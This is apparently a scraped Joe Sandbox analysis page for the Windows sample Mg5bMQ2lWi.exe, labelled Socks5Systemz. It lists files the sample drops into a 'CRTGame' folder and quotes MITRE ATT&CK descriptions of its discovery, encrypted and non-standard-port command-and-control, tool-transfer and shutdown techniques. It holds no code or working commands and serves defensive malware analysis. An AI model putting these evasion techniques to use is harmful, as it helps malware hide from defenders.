Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Mg5bMQ2lWi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Socks5Systemz

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)

C:\Program Files (x86)\CRTGame\bin\x86\COPYING.LGPLv2.1 (copy)

C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)

C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)

Windows Analysis Report
Mg5bMQ2lWi.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre